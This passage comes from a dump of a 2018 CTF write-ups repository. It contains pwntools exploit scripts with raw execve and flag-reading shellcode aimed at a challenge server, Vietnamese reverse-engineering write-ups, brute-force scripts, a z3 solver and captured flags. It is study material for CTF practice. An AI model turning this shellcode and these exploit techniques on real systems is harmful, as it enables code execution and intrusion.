shellcode +="80ea000069464ff020024ff0030741df" # shellcraft.read(0, 'sp', 32) 24 | shellcode +="46f26177c4f2001780b442f62e77c6f6664780b4684681ea010182ea02024ff0050700df01464ff0010082ea02026ff000434ff0bb0700df" # shellcraft.arm.linux.cat("./flag") 25 | 26 | shellcode = shellcode.decode("hex") 27 | key = "concavangmauxanhlacay" 28 | s = '' 29 | for i in range(len(shellcode)): 30 | s += chr(ord(shellcode[i])^ord(key[i%len(key)])) 31 | 32 | open(filename,"wb").write(s) 33 | process = Popen(["./encode", filename], stdout=PIPE, stderr=PIPE) 34 | stdout, stderr = process.communicate() 35 | print stdout 36 | 37 | encode() -------------------------------------------------------------------------------- /2018/N1CTF/pwn/beeper/beeper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/N1CTF/pwn/beeper/beeper -------------------------------------------------------------------------------- /2018/N1CTF/pwn/beeper/beeper.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | from ctypes import CDLL 5 | 6 | def beeper(DEBUG): 7 | shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 8 | proc = CDLL("/lib/x86_64-linux-gnu/libc-2.23.so") 9 | timefunc = proc.time 10 | srand = proc.srand 11 | rand = proc.rand 12 | 13 | def inc_address(): 14 | return "\x68" 15 | 16 | def inc_value(): 17 | return "\x6d" 18 | 19 | def dec_address(): 20 | return "\x6f" 21 | 22 | def dec_value(): 23 | return "\x75" 24 | 25 | def break_loop(): 26 | return "\x7d\x00" 27 | 28 | def gen_payload_shellcode(address): 29 | for i in xrange(len(shellcode)): 30 | password = "\x00"*0x68 31 | password += p64(address+0x48+i) 32 | password += inc_value()*ord(shellcode[i]) 33 | password += break_loop() 34 | r.sendline(password) 35 | 
36 | def ReadPassword(address): 37 | password = "\x00"*0x68 38 | password += p64(address+0x46) 39 | password += dec_value()*(0xc9-0x90) # 0xc9 (leave) => nop 40 | password += inc_address()+dec_value()*(0xc3-0x90) # 0xc3 (ret) => nop 41 | password += break_loop() 42 | r.sendline(password) 43 | gen_payload_shellcode(address) 44 | 45 | if DEBUG=="1": 46 | r = process("./beeper") 47 | elif DEBUG=="2": 48 | HOST = '47.91.210.30' 49 | PORT = 23333 50 | r = remote(HOST,PORT) 51 | 52 | srand(timefunc(0)) 53 | ADDRESS = rand() 54 | ADDRESS = (((ADDRESS + 16) << 12) + (((ADDRESS + 16) << 12) >= 0xFFFFFFFF))-1 55 | ADDRESS = ADDRESS&0xffffffff 56 | log.info('ADDRESS: %#x' % ADDRESS) # Buy function address 57 | 58 | raw_input("debug?") 59 | ReadPassword(ADDRESS) 60 | 61 | password = "\x00"*0x68 62 | password += p64(ADDRESS+0x100) 63 | password += break_loop() # change VM code to do nothing 64 | r.sendline(password) 65 | 66 | password = "\x86\x13\x81\x09\x62\xFF\x44\xD3\x3F\xCD\x19\xB0\xFB\x88\xFD\xAE\x20\xDF" 67 | r.sendline(password) # Login success 68 | 69 | r.sendline("3") # Buy => call shellcode 70 | 71 | r.interactive() 72 | 73 | beeper(sys.argv[1]) 74 | # N1CTF{5h3l1_c0d1n9_w17h_Hbf_1s_s0_e45y_233} -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE150/chall-0124a47969d0e6ff9ff639198decbea2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Ph03nixCTF-2018/RE/RE150/chall-0124a47969d0e6ff9ff639198decbea2 -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/RE200.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Ph03nixCTF-2018/RE/RE200/RE200.exe 
-------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/RE200.py: -------------------------------------------------------------------------------- 1 | a="\xA0\xE3\xA6\xA1\xB0\xE0\x8C\xB0\xA1\xE7\xB0\xB8\xE0\xA1" 2 | def sxor(s1,s2): 3 | return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2)) 4 | 5 | print sxor(a,"\xd3"*len(a)) 6 | # s0urc3_cr4ck3r -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/README.md: -------------------------------------------------------------------------------- 1 | # RE200 2 | **Category:** RE 3 | **Points:** 200 4 | ## Writeup 5 | ``` 6 | $ file RE200.exe 7 | RE200.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows 8 | ``` 9 | Coi sơ binary bài này mình thấy chương trình qua cái hàm nào đó rồi nó yêu cầu mình nhập 1 số vào, sau đó nó lấy 1 byte số đó xor với mem ở địa chỉ 0x408180 rồi chương trình sẽ call 0x408180 10 | 11 | Phải đúng cái số thì mem nó mới ra đúng instruction để ra được flag, mình ngại tính với đoán nên mình code 1 file bat để bruteforce từ 0 -> 255. 12 | ``` 13 | echo 1 | RE200.exe 14 | echo 2 | RE200.exe 15 | echo 3 | RE200.exe 16 | ... 17 | echo 131 | RE200.exe 18 | echo 132 | RE200.exe 19 | echo 133 | RE200.exe 20 | echo 134 | RE200.exe 21 | echo 135 | RE200.exe 22 | echo 136 | RE200.exe 23 | echo 137 | RE200.exe 24 | echo 138 | RE200.exe 25 | echo 139 | RE200.exe 26 | echo 140 | RE200.exe 27 | ... 
28 | echo 250 | RE200.exe 29 | echo 251 | RE200.exe 30 | echo 252 | RE200.exe 31 | echo 253 | RE200.exe 32 | echo 254 | RE200.exe 33 | echo 255 | RE200.exe 34 | ``` 35 | **Kết quả bruteforce:** 36 | ``` 37 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 134 | RE200.exe 38 | This challenge brought to you by nghiadtse05330 39 | Give me your farvorite number: 40 | 41 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 135 | RE200.exe 42 | This challenge brought to you by nghiadtse05330 43 | Give me your farvorite number: 44 | 45 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 136 | RE200.exe 46 | This challenge brought to you by nghiadtse05330 47 | Give me your farvorite number: 48 | Enter your name: There is nothing for you 49 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 137 | RE200.exe 50 | This challenge brought to you by nghiadtse05330 51 | Give me your farvorite number: 52 | ``` 53 | 54 | Vậy input nhập vào là 136. 55 | 56 | Tiếp theo trace chương trình sau khi xor mem 0x408180 57 | 58 | Chương trình yêu gọi fgets yêu cầu nhập name, rồi dùng strlen để check length nếu bằng 0x0E thì lấy name xor với 0xD3 rồi dùng strcmp so sánh với mem 0x408374, bằng thì xuất flag 59 | 60 | Vậy mình lấy 0x0E bytes từ 0x408374 ra và xor với 0xD3 là ra name phù hợp. 
61 | ```python 62 | a="\xA0\xE3\xA6\xA1\xB0\xE0\x8C\xB0\xA1\xE7\xB0\xB8\xE0\xA1" 63 | def sxor(s1,s2): 64 | return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2)) 65 | 66 | print sxor(a,"\xd3"*len(a)) 67 | # s0urc3_cr4ck3r 68 | ``` 69 | 70 | **Flag:** 71 | ``` 72 | D:\CTF\CTFs\2018\Ph0nix\RE>RE200.exe 73 | This challenge brought to you by nghiadtse05330 74 | Give me your farvorite number: 75 | 136 76 | Enter your name: s0urc3_cr4ck3r 77 | Welcome 200 points for your brilliant 78 | This is your flag: Ph03nix{s0urc3_cr4ck3r_r4t_d3p_tr4i} 79 | ``` -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/re200.bat: -------------------------------------------------------------------------------- 1 | echo 1 | RE200.exe 2 | echo 2 | RE200.exe 3 | echo 3 | RE200.exe 4 | echo 4 | RE200.exe 5 | echo 5 | RE200.exe 6 | echo 6 | RE200.exe 7 | echo 7 | RE200.exe 8 | echo 8 | RE200.exe 9 | echo 9 | RE200.exe 10 | echo 10 | RE200.exe 11 | echo 11 | RE200.exe 12 | echo 12 | RE200.exe 13 | echo 13 | RE200.exe 14 | echo 14 | RE200.exe 15 | echo 15 | RE200.exe 16 | echo 16 | RE200.exe 17 | echo 17 | RE200.exe 18 | echo 18 | RE200.exe 19 | echo 19 | RE200.exe 20 | echo 20 | RE200.exe 21 | echo 21 | RE200.exe 22 | echo 22 | RE200.exe 23 | echo 23 | RE200.exe 24 | echo 24 | RE200.exe 25 | echo 25 | RE200.exe 26 | echo 26 | RE200.exe 27 | echo 27 | RE200.exe 28 | echo 28 | RE200.exe 29 | echo 29 | RE200.exe 30 | echo 30 | RE200.exe 31 | echo 31 | RE200.exe 32 | echo 32 | RE200.exe 33 | echo 33 | RE200.exe 34 | echo 34 | RE200.exe 35 | echo 35 | RE200.exe 36 | echo 36 | RE200.exe 37 | echo 37 | RE200.exe 38 | echo 38 | RE200.exe 39 | echo 39 | RE200.exe 40 | echo 40 | RE200.exe 41 | echo 41 | RE200.exe 42 | echo 42 | RE200.exe 43 | echo 43 | RE200.exe 44 | echo 44 | RE200.exe 45 | echo 45 | RE200.exe 46 | echo 46 | RE200.exe 47 | echo 47 | RE200.exe 48 | echo 48 | RE200.exe 49 | echo 49 | RE200.exe 50 | echo 50 | RE200.exe 51 | 
echo 51 | RE200.exe 52 | echo 52 | RE200.exe 53 | echo 53 | RE200.exe 54 | echo 54 | RE200.exe 55 | echo 55 | RE200.exe 56 | echo 56 | RE200.exe 57 | echo 57 | RE200.exe 58 | echo 58 | RE200.exe 59 | echo 59 | RE200.exe 60 | echo 60 | RE200.exe 61 | echo 61 | RE200.exe 62 | echo 62 | RE200.exe 63 | echo 63 | RE200.exe 64 | echo 64 | RE200.exe 65 | echo 65 | RE200.exe 66 | echo 66 | RE200.exe 67 | echo 67 | RE200.exe 68 | echo 68 | RE200.exe 69 | echo 69 | RE200.exe 70 | echo 70 | RE200.exe 71 | echo 71 | RE200.exe 72 | echo 72 | RE200.exe 73 | echo 73 | RE200.exe 74 | echo 74 | RE200.exe 75 | echo 75 | RE200.exe 76 | echo 76 | RE200.exe 77 | echo 77 | RE200.exe 78 | echo 78 | RE200.exe 79 | echo 79 | RE200.exe 80 | echo 80 | RE200.exe 81 | echo 81 | RE200.exe 82 | echo 82 | RE200.exe 83 | echo 83 | RE200.exe 84 | echo 84 | RE200.exe 85 | echo 85 | RE200.exe 86 | echo 86 | RE200.exe 87 | echo 87 | RE200.exe 88 | echo 88 | RE200.exe 89 | echo 89 | RE200.exe 90 | echo 90 | RE200.exe 91 | echo 91 | RE200.exe 92 | echo 92 | RE200.exe 93 | echo 93 | RE200.exe 94 | echo 94 | RE200.exe 95 | echo 95 | RE200.exe 96 | echo 96 | RE200.exe 97 | echo 97 | RE200.exe 98 | echo 98 | RE200.exe 99 | echo 99 | RE200.exe 100 | echo 100 | RE200.exe 101 | echo 101 | RE200.exe 102 | echo 102 | RE200.exe 103 | echo 103 | RE200.exe 104 | echo 104 | RE200.exe 105 | echo 105 | RE200.exe 106 | echo 106 | RE200.exe 107 | echo 107 | RE200.exe 108 | echo 108 | RE200.exe 109 | echo 109 | RE200.exe 110 | echo 110 | RE200.exe 111 | echo 111 | RE200.exe 112 | echo 112 | RE200.exe 113 | echo 113 | RE200.exe 114 | echo 114 | RE200.exe 115 | echo 115 | RE200.exe 116 | echo 116 | RE200.exe 117 | echo 117 | RE200.exe 118 | echo 118 | RE200.exe 119 | echo 119 | RE200.exe 120 | echo 120 | RE200.exe 121 | echo 121 | RE200.exe 122 | echo 122 | RE200.exe 123 | echo 123 | RE200.exe 124 | echo 124 | RE200.exe 125 | echo 125 | RE200.exe 126 | echo 126 | RE200.exe 127 | echo 127 | RE200.exe 128 | echo 128 | 
RE200.exe 129 | echo 129 | RE200.exe 130 | echo 130 | RE200.exe 131 | echo 131 | RE200.exe 132 | echo 132 | RE200.exe 133 | echo 133 | RE200.exe 134 | echo 134 | RE200.exe 135 | echo 135 | RE200.exe 136 | echo 136 | RE200.exe 137 | echo 137 | RE200.exe 138 | echo 138 | RE200.exe 139 | echo 139 | RE200.exe 140 | echo 140 | RE200.exe 141 | echo 141 | RE200.exe 142 | echo 142 | RE200.exe 143 | echo 143 | RE200.exe 144 | echo 144 | RE200.exe 145 | echo 145 | RE200.exe 146 | echo 146 | RE200.exe 147 | echo 147 | RE200.exe 148 | echo 148 | RE200.exe 149 | echo 149 | RE200.exe 150 | echo 150 | RE200.exe 151 | echo 151 | RE200.exe 152 | echo 152 | RE200.exe 153 | echo 153 | RE200.exe 154 | echo 154 | RE200.exe 155 | echo 155 | RE200.exe 156 | echo 156 | RE200.exe 157 | echo 157 | RE200.exe 158 | echo 158 | RE200.exe 159 | echo 159 | RE200.exe 160 | echo 160 | RE200.exe 161 | echo 161 | RE200.exe 162 | echo 162 | RE200.exe 163 | echo 163 | RE200.exe 164 | echo 164 | RE200.exe 165 | echo 165 | RE200.exe 166 | echo 166 | RE200.exe 167 | echo 167 | RE200.exe 168 | echo 168 | RE200.exe 169 | echo 169 | RE200.exe 170 | echo 170 | RE200.exe 171 | echo 171 | RE200.exe 172 | echo 172 | RE200.exe 173 | echo 173 | RE200.exe 174 | echo 174 | RE200.exe 175 | echo 175 | RE200.exe 176 | echo 176 | RE200.exe 177 | echo 177 | RE200.exe 178 | echo 178 | RE200.exe 179 | echo 179 | RE200.exe 180 | echo 180 | RE200.exe 181 | echo 181 | RE200.exe 182 | echo 182 | RE200.exe 183 | echo 183 | RE200.exe 184 | echo 184 | RE200.exe 185 | echo 185 | RE200.exe 186 | echo 186 | RE200.exe 187 | echo 187 | RE200.exe 188 | echo 188 | RE200.exe 189 | echo 189 | RE200.exe 190 | echo 190 | RE200.exe 191 | echo 191 | RE200.exe 192 | echo 192 | RE200.exe 193 | echo 193 | RE200.exe 194 | echo 194 | RE200.exe 195 | echo 195 | RE200.exe 196 | echo 196 | RE200.exe 197 | echo 197 | RE200.exe 198 | echo 198 | RE200.exe 199 | echo 199 | RE200.exe 200 | echo 200 | RE200.exe 201 | echo 201 | RE200.exe 202 | echo 202 | 
RE200.exe 203 | echo 203 | RE200.exe 204 | echo 204 | RE200.exe 205 | echo 205 | RE200.exe 206 | echo 206 | RE200.exe 207 | echo 207 | RE200.exe 208 | echo 208 | RE200.exe 209 | echo 209 | RE200.exe 210 | echo 210 | RE200.exe 211 | echo 211 | RE200.exe 212 | echo 212 | RE200.exe 213 | echo 213 | RE200.exe 214 | echo 214 | RE200.exe 215 | echo 215 | RE200.exe 216 | echo 216 | RE200.exe 217 | echo 217 | RE200.exe 218 | echo 218 | RE200.exe 219 | echo 219 | RE200.exe 220 | echo 220 | RE200.exe 221 | echo 221 | RE200.exe 222 | echo 222 | RE200.exe 223 | echo 223 | RE200.exe 224 | echo 224 | RE200.exe 225 | echo 225 | RE200.exe 226 | echo 226 | RE200.exe 227 | echo 227 | RE200.exe 228 | echo 228 | RE200.exe 229 | echo 229 | RE200.exe 230 | echo 230 | RE200.exe 231 | echo 231 | RE200.exe 232 | echo 232 | RE200.exe 233 | echo 233 | RE200.exe 234 | echo 234 | RE200.exe 235 | echo 235 | RE200.exe 236 | echo 236 | RE200.exe 237 | echo 237 | RE200.exe 238 | echo 238 | RE200.exe 239 | echo 239 | RE200.exe 240 | echo 240 | RE200.exe 241 | echo 241 | RE200.exe 242 | echo 242 | RE200.exe 243 | echo 243 | RE200.exe 244 | echo 244 | RE200.exe 245 | echo 245 | RE200.exe 246 | echo 246 | RE200.exe 247 | echo 247 | RE200.exe 248 | echo 248 | RE200.exe 249 | echo 249 | RE200.exe 250 | echo 250 | RE200.exe 251 | echo 251 | RE200.exe 252 | echo 252 | RE200.exe 253 | echo 253 | RE200.exe 254 | echo 254 | RE200.exe 255 | echo 255 | RE200.exe 256 | -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE350/README.md: -------------------------------------------------------------------------------- 1 | # RE350 2 | **Category:** RE 3 | **Points:** 350 4 | ## Writeup 5 | ``` 6 | $ file chall-95464f47e71ccb883149755d7a3573bb 7 | chall-95464f47e71ccb883149755d7a3573bb: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, 
BuildID[sha1]=ba487562699109f09e6273e0fbcc7ed1f81ab161, stripped 8 | ``` 9 | 10 | Coi sơ qua binary bài này thì mình thấy là nó yêu cầu nhập flag 0x45 bytes vào agrument rồi nó qua cái hàm encode rồi xor với cái mem 0x601058 rồi kiểm tra tổng của các phép xor nếu bằng 0 thì báo flag đúng. 11 | Vô ngó hàm encode thì ta thấy nó lấy input của ta add với 1 byte X nào đó rồi đưa lại 1 byte vào input, mà cái byte X đó lấy ra từ 0x601060 và cộng trừ nhân chia gì đó. 12 | 13 | Debug đặt breakpoint ở 0x400772 ta thấy những byte X đó là như sau: "\xffkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtf..." 14 | 15 | Vậy là ez rồi. 16 | 17 | Viết lại thuật toán bằng python: 18 | ```python 19 | encoded = "\x56\xd0\xd1\xe5\x4d\xcd\xe2\x9b\xdc\x94\xae\x9f\xbd\xa9\x9f\x8a\x93\x86\xe6\xe9\xd8\x8b\xcb\xe5\x8e\xd0\xad\x4d\xc7\xdc\x96\x9e\xd3\xe2\xa5\xe4\xc5\x60\xcd\xa7\xb8\xa0\x98\xd8\x60\xb7\xba\x5e\xc5\xa7\x99\xbd\x96\xc7\x74\xc8\xa4\x62\xd6\xca\x99\xbd\xbe\xd8\x73\xbe\xc1\xaa\x00" 20 | 21 | key = "\xff"+"key-is-wtf"*7 22 | flag = "" 23 | for i in xrange(0, 68): 24 | e = ord(encoded[i]) 25 | k = ord(key[i]) 26 | flag += chr(((e+0x100)-k)&0xff) 27 | print flag 28 | ``` 29 | 30 | **Flag:** 31 | ```$ python chall-95464f47e71ccb883149755d7a3573bb.py 32 | Well done H4X0r! 
Your flag: Ph03nix{R3V3R53_3NG1N33R1NG_15_V3RY_FUN} 33 | ``` 34 | -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE350/chall-95464f47e71ccb883149755d7a3573bb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Ph03nixCTF-2018/RE/RE350/chall-95464f47e71ccb883149755d7a3573bb -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE350/chall-95464f47e71ccb883149755d7a3573bb.py: -------------------------------------------------------------------------------- 1 | encoded = "\x56\xd0\xd1\xe5\x4d\xcd\xe2\x9b\xdc\x94\xae\x9f\xbd\xa9\x9f\x8a\x93\x86\xe6\xe9\xd8\x8b\xcb\xe5\x8e\xd0\xad\x4d\xc7\xdc\x96\x9e\xd3\xe2\xa5\xe4\xc5\x60\xcd\xa7\xb8\xa0\x98\xd8\x60\xb7\xba\x5e\xc5\xa7\x99\xbd\x96\xc7\x74\xc8\xa4\x62\xd6\xca\x99\xbd\xbe\xd8\x73\xbe\xc1\xaa\x00" 2 | 3 | key = "\xff"+"key-is-wtf"*7 4 | flag = "" 5 | for i in xrange(0, 68): 6 | e = ord(encoded[i]) 7 | k = ord(key[i]) 8 | flag += chr(((e+0x100)-k)&0xff) 9 | print flag 10 | -------------------------------------------------------------------------------- /2018/VolgaCTF/CrackMe/CrackMe.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import time 3 | import threading 4 | 5 | import base64 6 | import hashlib 7 | from Crypto import Random 8 | from Crypto.Cipher import AES 9 | import thread 10 | 11 | class myThread (threading.Thread): 12 | def __init__(self, key): 13 | threading.Thread.__init__(self) 14 | self.key = key 15 | def run(self): 16 | crack(self.key) 17 | 18 | 19 | class AESCipher(object): 20 | def __init__(self, key): 21 | self.bs = 16 22 | self.key = key 23 | 24 | def decrypt(self, enc): 25 | iv = enc[:AES.block_size] 26 | cipher = AES.new(self.key, AES.MODE_CBC, iv) 27 | return 
self._unpad(cipher.decrypt(enc[AES.block_size:])) 28 | 29 | def _pad(self, s): 30 | return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs) 31 | 32 | @staticmethod 33 | def _unpad(s): 34 | return s[:-ord(s[len(s)-1:])] 35 | 36 | def crack(key): 37 | aes = AESCipher(key) 38 | if "volgactf" in aes.decrypt(enc).lower(): 39 | print key.encode("hex") 40 | print aes.decrypt(enc) 41 | exit(1) 42 | 43 | 44 | enc = open("CrackMe.txt","rb").read() 45 | for i in xrange(256): 46 | print "i: %d" % i 47 | for i2 in xrange(256): 48 | print "i2: %d" % i2 49 | for i3 in xrange(256): 50 | for i4 in xrange(256): 51 | key = chr(i)+chr(i2)+chr(i3)+chr(i4) 52 | key = key*4 53 | crack(key) 54 | 55 | # VolgaCTF{my_little_cat_solved_this_much_faster} -------------------------------------------------------------------------------- /2018/VolgaCTF/You_Shall_Not_Pass/README.md: -------------------------------------------------------------------------------- 1 | We has 40 equations in these functions: 2 | sub_402060, sub_403250, sub_403C90, sub_405740, sub_403470, sub_402640, sub_401490, sub_403680, sub_4042A0, sub_402840, sub_405B80, sub_402E40, sub_405FC0, sub_401A60, sub_405DA0, sub_4061D0, sub_4040B0, sub_403050, sub_402A40, sub_4048D0, sub_405540, sub_401870, sub_404EF0, sub_405310, sub_401260, sub_403890, sub_402C50, sub_403EA0, sub_405100, sub_4046B0, sub_403A80, sub_401E60, sub_401C70, sub_404CD0, sub_404AD0, sub_4044A0, sub_402260, sub_402440, sub_405960, sub_401670 3 | 4 | For each function, first agrument is FLAG, second agrument is global variable checkFlag (1 = correct, 0 = incorrect). 5 | From information about format flag: Flags match **/VolgaCTF{[\x20-\x7F]+}/**, I know 10 character from flag and condition for each other character is **/[\x20-\x7F]/** 6 | I wrote a python script using z3 find flag [solve.py](/2018/VolgaCTF/You_Shall_Not_Pass/solve.py). 
7 | Flag: **VolgaCTF{D1$guis3_y0ur_code_and_y0u_@re_s@fe}** -------------------------------------------------------------------------------- /2018/VolgaCTF/You_Shall_Not_Pass/solve.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | x_9=Int('x_9') 4 | x_10=Int('x_10') 5 | x_11=Int('x_11') 6 | x_12=Int('x_12') 7 | x_13=Int('x_13') 8 | x_14=Int('x_14') 9 | x_15=Int('x_15') 10 | x_16=Int('x_16') 11 | x_17=Int('x_17') 12 | x_18=Int('x_18') 13 | x_19=Int('x_19') 14 | x_20=Int('x_20') 15 | x_21=Int('x_21') 16 | x_22=Int('x_22') 17 | x_23=Int('x_23') 18 | x_24=Int('x_24') 19 | x_25=Int('x_25') 20 | x_26=Int('x_26') 21 | x_27=Int('x_27') 22 | x_28=Int('x_28') 23 | x_29=Int('x_29') 24 | x_30=Int('x_30') 25 | x_31=Int('x_31') 26 | x_32=Int('x_32') 27 | x_33=Int('x_33') 28 | x_34=Int('x_34') 29 | x_35=Int('x_35') 30 | x_36=Int('x_36') 31 | x_37=Int('x_37') 32 | x_38=Int('x_38') 33 | x_39=Int('x_39') 34 | x_40=Int('x_40') 35 | x_41=Int('x_41') 36 | x_42=Int('x_42') 37 | x_43=Int('x_43') 38 | solve(x_9 >=32,x_9<=125, x_10 >=32,x_10<=125, x_11 >=32,x_11<=125, x_12 >=32,x_12<=125, x_13 >=32,x_13<=125, x_14 >=32,x_14<=125, x_15 >=32,x_15<=125, x_16 >=32,x_16<=125, x_17 >=32,x_17<=125, x_18 >=32,x_18<=125, x_19 >=32,x_19<=125, x_20 >=32,x_20<=125, x_21 >=32,x_21<=125, x_22 >=32,x_22<=125, x_23 >=32,x_23<=125, x_24 >=32,x_24<=125, x_25 >=32,x_25<=125, x_26 >=32,x_26<=125, x_27 >=32,x_27<=125, x_28 >=32,x_28<=125, x_29 >=32,x_29<=125, x_30 >=32,x_30<=125, x_31 >=32,x_31<=125, x_32 >=32,x_32<=125, x_33 >=32,x_33<=125, x_34 >=32,x_34<=125, x_35 >=32,x_35<=125, x_36 >=32,x_36<=125, x_37 >=32,x_37<=125, x_38 >=32,x_38<=125, x_39 >=32,x_39<=125, x_40 >=32,x_40<=125, x_41 >=32,x_41<=125, x_42 >=32,x_42<=125, x_43 >=32,x_43<=125, 13*x_29+x_36*132*86+13*x_19+3*111-x_30*14*x_30+x_34*60*103-14*x_26-8*x_28-x_28+3*x_19+10*70-97+x_30+8*x_42==1311351, 
-11*x_43+x_20*20*125+x_35*60*67-x_40*103*1008*111+8*125-10*x_28-7*x_35-2*x_27-4*x_17-x_17-8*x_26-x_18-8*x_9==-1324642844, 11*84+x_25+7*(x_32+x_26)+x_36*180*x_33+x_35*99*x_9-12*x_42-x_22*32*x_27+10*x_15+15*123+8*97-10*x_33+14*123==910067, 15*86+13*x_13+-13*103+3*x_15+3*x_34+6*x_39-x_32*60*x_38+15*x_33+84*60*x_32-4*x_30-x_30-8*x_36-x_36-x_11+8*x_35+7*86==-119712, 9*67+123+86+10*103-x_13*84*108+x_27*16*x_28+12*x_28+2*x_11-14*x_40-12*x_32+15*x_10-4*x_23-x_23-3*x_11-5*67==-914171, 11*x_31+13*x_18+x_18*84*x_26-12*70+14*x_42+6*x_23-x_20*x_33*1260*x_24-125*98*x_17+x_41*270*x_43*x_33+10*123==-701812476, -11*x_23+9*x_36+-7*x_36+x_38*78*86-8*x_40-x_40-x_42*10*x_34-7*x_36+x_36+x_13*x_14*560*x_34-x_32+11*x_32+15*x_35==805471623, 125*55*x_15+x_17*48*x_36+2*(x_19+6*108)-x_14*14*x_38+11*108-12*84*x_14+8*x_11-x_11+x_23*13*x_18-10*97+3*x_21==986086, 13*x_20+7*108-14*x_42-4*x_24+8*x_37+x_19*78*x_36-63*x_24*x_42-x_18-2*x_20-4*x_31+4*x_15+10*x_38+7*x_20-4*x_26==-471203, x_43+x_27+3*x_29+-9*x_20+4*x_15-x_25-x_41+15*x_12-6*x_13+4*x_9-97*24*x_28+130*97*x_41+14*103+8*86-86==584152, 11*x_18-8*x_22+4*x_17-9*x_29+8*x_14-8*111-12*x_38+2*x_26-11*x_14+6*103+x_39*3*x_35-10*x_16+22*x_21*x_29+14*x_42==302239, 15*x_35+-13*x_14+-7*x_41+-7*x_38+9*103+x_39*x_9*360*x_16+6*x_24-x_30+135*108*x_16-9*x_9+4*x_30-x_23*112*x_10==118806054, 13*111+-3*x_25+x_28*150*x_27+-13*x_43+x_38*12*86-4*x_29-x_10-2*x_42+4*x_26-8*x_33-10*x_12+x_39*18*x_24+13*x_20==1675940, x_18+5*x_37+15*x_43+x_16+11*x_13+84*15*x_23-6*x_20-123*10*x_23+135*x_20*84+10*x_19-6*x_18+14*108-12*x_33==1333282, 9*86+9*111+84*156*x_24-4*x_32-x_32+2*x_39+15*x_9+10*x_24-4*x_19+8*x_20+4*x_20-8*x_23-x_23+13*x_40-7*x_29-3*x_36-12*86==1457854, 13*67+13*x_36+7*x_9-15*x_30-12*x_43+11*x_40-12*x_18+12*x_12-11*x_18-97*104*86-x_20*132*111-8*84+8*x_19-x_19+5*x_14==-2582478, 9*x_40+11*x_18+3*x_21+-13*111+x_31+x_30-4*x_29+8*97-97-x_36*210*x_29-14*x_37-6*125*x_21-2*x_39+8*x_29+4*x_35==-1562727, 
3*x_31+6*x_19-70*130*x_36+12*x_40-x_12*42*x_31+4*108+10*86+x_10*99*x_28-x_34*40*x_24-8*67+x_12+7*86==-1038889, x_23+5*x_41+9*103+111*15*x_41+5*x_22-15*x_25-x_31*24*x_22-4*x_12-x_16*36*125-10*97+9*123-45*x_34*111==-923909, 15*67+x_33*130*x_40+97+2*x_10-x_35*132*x_16+x_14*75*x_23-2*x_24-6*x_32-2*x_26+4*x_40-11*x_15+4*x_19-8*67==856586, 5*x_31+-15*x_39+x_19*90*x_18+x_27*16*x_16-125*x_41*70*x_28+2*123+x_42*35*x_38+10*70+2*x_12+8*x_29+4*x_20==-53357640, 5*x_23+111+4*(2*x_29-x_18-x_21)+x_28*39*x_12-x_36*x_22*30*x_21+8*x_26-x_26+x_18+12*86-10*x_17-12*x_27*x_17==-20510795, 3*x_41+5*84+8*x_10+10*123-x_41*28*x_9-10*x_30+10*x_21+10*x_19-x_24+5*123-10*x_22-3*x_23+4*x_32+9*x_30+11*x_28==-117294, 9*x_43+15*x_29+111*120*125+12*x_13+12*x_15+14*x_32+10*x_25+13*x_37-4*x_22-x_22+8*x_26-x_26-4*x_36-x_36-x_13+7*x_13-x_40*36*x_38==1256993, 9*x_25+5*123+x_37*28*x_23+6*x_13-6*x_17-3*x_26-2*x_36-6*97-10*x_29-8*103+x_24*99*x_9+4*x_19+x_11*84*x_12==1373634, -3*x_17+9*x_24+4*x_37+9*x_34-4*x_34+8*x_15+70*40*x_42+10*x_15-x_11*x_27*360*x_16+12*67-15*x_10*x_16+13*111==-62537013, -5*x_23+15*x_26+8*x_25+15*x_23-111*90*84-6*x_32-4*123-13*x_32+x_26-x_14*70*x_23-4*x_9-8*x_19-x_12*78*x_33==-1952483, 9*x_22+-7*x_27+8*111+4*(3*x_9-3*x_31)-6*x_10+2*x_38+8*x_41-x_41-4*x_13-x_13-2*123-x_10*60*x_16+111*60*x_38-x_28*7*111==447630, 13*70+-7*x_13+9*x_27+-2*x_35+12*x_34-3*x_14+63*125*x_27-7*x_20+x_37*70*x_42-x_32*156*x_19-2*x_12-12*x_10==656269, 11*x_9+111*56*108-4*84-84-x_20*77*x_14-12*x_34-11*x_38-8*67-15*x_26+x_11*x_41*72*x_29-x_18*x_35*528*x_32==-716423735, 